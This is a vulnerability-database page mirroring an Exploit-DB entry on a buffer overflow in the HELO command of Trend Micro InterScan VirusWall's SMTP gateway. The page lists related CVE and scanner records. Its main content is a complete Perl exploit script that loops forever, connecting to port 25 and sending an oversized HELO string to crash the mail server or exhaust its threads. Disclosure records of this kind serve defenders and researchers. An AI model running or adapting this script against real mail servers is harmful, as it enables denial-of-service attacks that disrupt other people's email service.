Lucene search
+L

Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (1)

🗓️ 07 Nov 1999 00:00:00Reported by Alain Thivillon & Stephane AubertType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Buffer overflow in HELO command of VirusWall could enable DoS or arbitrary code execution.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-1529
12 Sep 200104:00
cve
cve
CVE
CVE-2001-0679
12 Sep 200104:00
cve
cvelist
Cvelist
CVE-1999-1529
12 Sep 200104:00
cvelist
cvelist
Cvelist
CVE-2001-0679
12 Sep 200104:00
cvelist
exploitdb
Exploit DB
Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (2)
7 Nov 199900:00
exploitdb
nessus
Tenable Nessus
Trend Micro InterScan 3.32 SMTP HELO Command Remote Overflow DoS
17 Apr 200000:00
nessus
nvd
NVD
CVE-1999-1529
7 Nov 199905:00
nvd
nvd
NVD
CVE-2001-0679
8 Nov 199905:00
nvd
source: https://www.securityfocus.com/bid/787/info

There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server.

This issue was patched by InterScan, however even with the patch it is possible to cause a DoS of the mail server software by sending between 4075 and 4090 characters.

#!/usr/bin/perl

# (c) Alain Thivillon & Stephane Aubert
#     Herve Schauer Consultants 2000
#     http://www.hsc.fr/
#
#     Do not use this stuff against Microsoft MX hosts :)
#
# Crash Interscan SMTP Server on Windows NT Version 3.32 Builds 1011 and 1022
# Depending of debugger installed on NT, crash can be immediat if you use
# Drwatson.32.exe (new connections get stuck), or can be limited to single
# thread if Auto=0 in NT Debug key. Interscan limits number of running
# threads (default 25) so it' very easy to exhaust all threads and finally
# force answer to '452 Too Busy'

use Socket;
use FileHandle;

$vict=$ARGV[0];

$AF_INET = 2;
$SOCK_STREAM = 1;
$port=25;
$sockaddr = 'S n a4 x8';

($name, $aliases, $type, $len, $thataddr) = gethostbyname($vict);
$that = pack($sockaddr, $AF_INET, $port, $thataddr);

while (1) {
  $mysock=new FileHandle;
  socket($mysock, $AF_INET, $SOCK_STREAM, $proto) || die "socket failed\n";
  connect($mysock, $that) || die "Connect failed\n";
  select($mysock); $| = 1; select(STDOUT); $| = 1;

  $line = <$mysock>;
  print $line;
  print $mysock "HELO ",'a'x4075,"\r\n";
  $line = <$mysock>;
  print $line;
  close $mysock;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.16027
34